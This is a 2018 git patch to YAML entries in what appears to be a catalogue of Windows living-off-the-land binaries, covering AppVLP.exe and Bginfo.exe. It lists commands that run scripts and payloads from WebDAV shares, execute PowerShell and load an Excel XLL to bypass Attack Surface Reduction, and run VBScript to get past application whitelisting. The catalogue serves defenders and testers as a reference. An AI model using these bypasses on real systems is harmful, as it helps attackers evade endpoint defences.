From 95dc80b8cd8238b08d75217d251a012217140bf2 Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Tue, 18 Sep 2018 23:06:22 -0400 Subject: [PATCH] Updated yml for: appvlp and bginfo. --- yml/OtherMSBinaries/Appvlp.yml | 9 ++++++--- yml/OtherMSBinaries/Bginfo.yml | 27 +++++++++++++++++++++++---- 2 files changed, 29 insertions(+), 7 deletions(-) diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index b886119..1e17096 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -5,6 +5,7 @@ Author: '' Created: '2018-05-25' Commands: - Command: AppVLP.exe \\webdav\calc.bat + Usecase: Execution of BAT file hosted on Webdav server. Description: Executes calc.bat through AppVLP.exe Categories: ['Execution', 'ASR Bypass'] Privileges: User @@ -12,6 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 w/Office 2016 - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" + Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Categories: ['Execution', 'ASR Bypass'] Privileges: User @@ -19,6 +21,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 w/Office 2016 - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" + Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Categories: ['Execution', 'ASR Bypass'] Privileges: User @@ -37,8 +40,8 @@ Resources: - https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ Acknowledgement: - Person: fab - Handle: @0rbz_ + Handle: '@0rbz_' - Person: Will - Handle: @moo_hax + Handle: '@moo_hax' - Person: Matt Wilson - Handle: @enigma0x3 + Handle: '@enigma0x3' diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 8b00538..feba596 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -1,20 +1,39 @@ --- Name: Bginfo.exe -Description: Execute -Author: '' +Description: Background Information Utility included with SysInternals Suite +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. + Usecase: Local execution of VBScript + Categories: ['Execution', 'AWL Bypass'] + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' + Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. + Categories: ['Execution', 'AWL Bypass'] + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt' + Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. + Categories: ['Execution', 'AWL Bypass'] + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows Full Path: - No fixed path Code Sample: [] Detection: [] Resources: - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -Notes: Thanks to Oddvar Moe - @oddvarmoe +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe'